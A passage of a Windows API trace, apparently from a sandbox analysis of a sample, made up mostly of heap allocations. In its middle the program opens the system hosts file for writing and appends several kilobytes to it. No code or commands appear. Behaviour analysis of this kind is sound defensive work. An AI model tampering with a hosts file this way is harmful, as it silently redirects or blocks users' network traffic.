[0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0xd8) returned 0x5ed720 [0129.777] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ed688 | out: hHeap=0x5c0000) returned 1 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec1e0 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec208 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x138) returned 0x5ed5d0 [0129.777] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ed720 | out: hHeap=0x5c0000) returned 1 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec230 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec258 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec280 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec2a8 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x1c8) returned 0x5ed710 [0129.777] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ed5d0 | out: hHeap=0x5c0000) returned 1 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec2d0 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec2f8 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec320 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec348 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x2a0) returned 0x5f1358 [0129.777] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ed710 | out: hHeap=0x5c0000) returned 1 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec370 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec398 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec3c0 [0129.777] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec3e8 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec410 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5ec438 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1618 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1640 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x3f0) returned 0x5ed5d0 [0129.778] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1358 | out: hHeap=0x5c0000) returned 1 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1668 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1690 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f16b8 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f16e0 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1708 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1730 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1758 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1780 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f17a8 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x5e8) returned 0x5f1e00 [0129.778] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ed5d0 | out: hHeap=0x5c0000) returned 1 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f17d0 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f17f8 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1820 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1848 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1870 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1898 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f18c0 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f18e8 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1910 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1938 [0129.778] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x8d0) returned 0x5f23f0 [0129.779] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1e00 | out: hHeap=0x5c0000) returned 1 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1960 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1988 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f19b0 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f19d8 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1a00 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1a28 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1a50 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1a78 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1aa0 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1ac8 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1af0 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1b18 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1b40 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1b68 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1b90 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1bb8 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0xd38) returned 0x5f2cc8 [0129.779] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f23f0 | out: hHeap=0x5c0000) returned 1 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1be0 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1c08 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1c30 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1c58 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1c80 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1ca8 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1cd0 [0129.779] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1cf8 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1d20 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1d48 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1d70 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1d98 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1dc0 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1e18 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1e40 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1e68 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1e90 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1eb8 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1ee0 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1f08 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1f30 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1f58 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1f80 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1fa8 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1fd0 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f1ff8 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2020 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2048 [0129.780] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x13eb) returned 0x5f3a08 [0129.781] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2cc8 | out: hHeap=0x5c0000) returned 1 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2070 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2098 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f20c0 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f20e8 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x30) returned 0x5d5490 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2110 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2138 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2160 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2188 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f21b0 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f21d8 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2200 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2228 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2250 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2278 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f22a0 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f22c8 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f22f0 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2318 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2340 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2368 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2390 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f23b8 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f23e0 [0129.781] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2408 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2430 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2458 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2480 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f24a8 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f24d0 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f24f8 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2520 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2548 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2570 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2598 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f25c0 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2618 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x1dc3) returned 0x5f4e00 [0129.782] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f3a08 | out: hHeap=0x5c0000) returned 1 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2640 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2668 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2690 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f26b8 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f26e0 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2708 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2730 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2758 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2780 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f27a8 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f27d0 [0129.782] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f27f8 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2820 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2848 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2870 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2898 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f28c0 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f28e8 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2910 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2938 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2960 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2988 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f29b0 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f29d8 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2a00 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2a28 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2a50 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2a78 [0129.783] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x20) returned 0x5f2aa0 [0129.783] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5eff28 | out: hHeap=0x5c0000) returned 1 [0129.783] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x18edb0 | out: pszPath="C:\\Windows") returned 0x0 [0129.813] PathAppendW (in: pszPath="C:\\Windows", pMore="System32\\drivers\\etc\\hosts" | out: pszPath="C:\\Windows\\System32\\drivers\\etc\\hosts") returned 1 [0129.813] CreateFileW (lpFileName="C:\\Windows\\System32\\drivers\\etc\\hosts" (normalized: "c:\\windows\\system32\\drivers\\etc\\hosts"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0129.814] GetFileSize (in: hFile=0xa0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x338 [0129.814] SetFilePointer (in: hFile=0xa0, lDistanceToMove=824, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x338 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x30) returned 0x5d5500 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x47) returned 0x5f0110 [0129.814] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5d5500 | out: hHeap=0x5c0000) returned 1 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x6a) returned 0x5f0160 [0129.814] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f0110 | out: hHeap=0x5c0000) returned 1 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x9e) returned 0x5f01d8 [0129.814] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f0160 | out: hHeap=0x5c0000) returned 1 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0xec) returned 0x5f0280 [0129.814] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f01d8 | out: hHeap=0x5c0000) returned 1 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x161) returned 0x5f0110 [0129.814] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f0280 | out: hHeap=0x5c0000) returned 1 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x211) returned 0x5f0280 [0129.814] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f0110 | out: hHeap=0x5c0000) returned 1 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x319) returned 0x5f04a0 [0129.814] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f0280 | out: hHeap=0x5c0000) returned 1 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x4a5) returned 0x5f07c8 [0129.814] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f04a0 | out: hHeap=0x5c0000) returned 1 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x6f7) returned 0x5f0c78 [0129.814] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f07c8 | out: hHeap=0x5c0000) returned 1 [0129.814] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0xa72) returned 0x5f0110 [0129.815] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f0c78 | out: hHeap=0x5c0000) returned 1 [0129.815] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0xfaa) returned 0x5f2e00 [0129.815] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f0110 | out: hHeap=0x5c0000) returned 1 [0129.815] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x17a1) returned 0x5f6bd0 [0129.815] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f2e00 | out: hHeap=0x5c0000) returned 1 [0129.815] RtlAllocateHeap (HeapHandle=0x5c0000, Flags=0x0, Size=0x235f) returned 0x5f8380 [0129.815] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f6bd0 | out: hHeap=0x5c0000) returned 1 [0129.815] WriteFile (in: hFile=0xa0, lpBuffer=0x5f83a0*, nNumberOfBytesToWrite=0x1c76, lpNumberOfBytesWritten=0x18ed70, lpOverlapped=0x0 | out: lpBuffer=0x5f83a0*, lpNumberOfBytesWritten=0x18ed70*=0x1c76, lpOverlapped=0x0) returned 1 [0129.816] CloseHandle (hObject=0xa0) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f8380 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec118 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec140 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec168 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec190 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec1b8 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec1e0 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec208 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec230 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec258 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec280 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec2a8 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec2d0 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec2f8 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec320 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec348 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec370 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec398 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec3c0 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec3e8 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec410 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5ec438 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1618 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1640 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1668 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1690 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f16b8 | out: hHeap=0x5c0000) returned 1 [0129.818] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f16e0 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1708 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1730 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1758 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1780 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f17a8 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f17d0 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f17f8 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1820 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1848 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1870 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1898 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f18c0 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f18e8 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1910 | out: hHeap=0x5c0000) returned 1 [0129.819] HeapFree (in: hHeap=0x5c0000, dwFlags=0x0, lpMem=0x5f1938 | out: hHeap=0x5c0000) returned 